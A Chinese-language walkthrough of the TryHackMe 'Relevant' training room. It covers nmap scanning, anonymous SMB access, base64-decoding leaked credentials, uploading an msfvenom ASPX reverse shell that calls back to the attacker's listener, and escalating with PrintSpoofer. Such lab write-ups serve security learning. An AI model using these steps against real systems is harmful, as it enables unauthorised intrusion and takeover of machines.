TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起å进步、一起GET THE FLAG!
THM靶场:RELEVANT「渗透测试挑战」
您已被分配给一个客户,该客户希望在一个环境中进行渗透测试,该环境将在 7 天内发布到生产环境中。
工作范围:
客户要求工程师对提供的虚拟环境进行评估。客户要求提供有关评估的最少信息,希望从恶意行为者的角度进行参与(黑盒渗透测试)。客户要求您保护两个标志(未提供位置)作为利用证明:
user.txt
root.txt
此外,客户提供了以下范围津贴:
本次活动允许使用任何工具或技术,但我们要求您先尝试手动利用
找到并记录所有发现的漏洞
将发现的标志提交到仪表板
只有分配给您机器的 IP 地址在范围内
查找并报告所有漏洞(是的,root 路径不止一个)
(COSPLAY关闭)
很显然,这是一个模拟真实渗透测试环境的一个房间。介绍里给了测试的范围、还有找出其他漏洞的津贴啥的,但是我们毫不关心,作为一个白帽子黑客(bushi),我们目标就是干碎他的系统,获取user和root权限,很简单,直接开干~
启动机器,连接openvpn,点击“Start Machine”获取目标IP,本次测试使用KAIL作为攻击机,连接成功后显示如下:
这是一个IIS的默认页面,看到这个页面,一下子脑子里就涌入了大量的漏洞可以利用的,我们暂时不着急,先把我们的三板斧打完,先来一套NMAP连击:
export IP=10.10.xx.xx //设置靶机IP
nmap -Pn -T5 --max-retries 2500 -sC -sV -oN nmap/initial $IP //扫描开始,将结果保存在nmap/initial中
分析扫描结果,我们不难发现,服务器上开启了SMB服务,我们先进去探索下
smbclient -L \\\\10.10.34.124\\
很幸运,默认无密码,我们直接进来了
分析下,我们可以看到一个nt4wrksv的用户,可能是管理员配置的失误,我们再访问下这个用户:
同样的无密码,我们直接进入。做到这里真是无语了,不吐不快,很多人会说,现实生活中真的有这么傻的人连密码都不设的吗?其实真实情况可能比这个更恐怖,据说某国外军方的后台服务器密码用的都是123456。弱口令早已经成为全球第一大危险漏洞,不管你技术如何,学识如何,也很难填补上人性的漏洞。我们继续分析,看到一个password文件,直接下载下来:
学过密码学或者打过相关CTF的应该能很明显的看出来,这两个都是BASE64的加密方式,操作一下解密,也可以在一些网站解密,随你喜欢
所以很简单,我们获取到了BOb和Bill的密码。这里往下我们有两个思路,可以跑一下网站的目录,找找看有没有什么漏洞,或者我们可以直接利用SMB服务上传反向shell来直接G-SHELL。我们选择直接上传shell,这里需要用到一个网站:https://pentest.ws/tools/venom-builder。
我们设置一下所需要的条件,它会帮我们构造好命令,msfvenom命令已经构造完成,我们直接复制粘贴:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.2.118.230 LPORT=9999 -f aspx -o akahrz.aspx
msfvenom构造完成后直接上传:
上传文件成功后,我们直接在URL中访问,注意先nc 一波接受反弹shell:
成功获取了user权限后,正常的思维我们应该是找一波漏洞直接提权,这里我们可以用常规套路使用WINPEAS,可以参考我之前的文章,这里我们不使用WINPEAS,查阅资料后,我们使用PrintSpoofer文件进行提权,下载链接:https://github.com/dievus/printspoofer
然后我们直接运行文件,轻松获取system权限,游戏结束!
RELEVANT 靶场通关小结
在这个房间中,一开始以真实的渗透测试的形式表达出这是一个漏洞很多的网站,但是在测试过程中我们会发现真的很简单,前提是你的思路要正确。就像Joe Helle(国外一个黑客所说),不一定每个BOX都要TRY HARDER,而是要想办法了解更多之前没有理解和发现的知识点。如果有部分不明白的,可以把流程反反复复的多看几遍,同时也非常欢迎大家私信我,如果觉得内容做的不错的话,也可以关注我的公众号:HACKER 航仔 以获取最新消息并与我联系,十分感谢能看到这里的各位,虽然制作不易,看到你们的点赞我还是很开心的!我们下期再见,拜了个拜~~~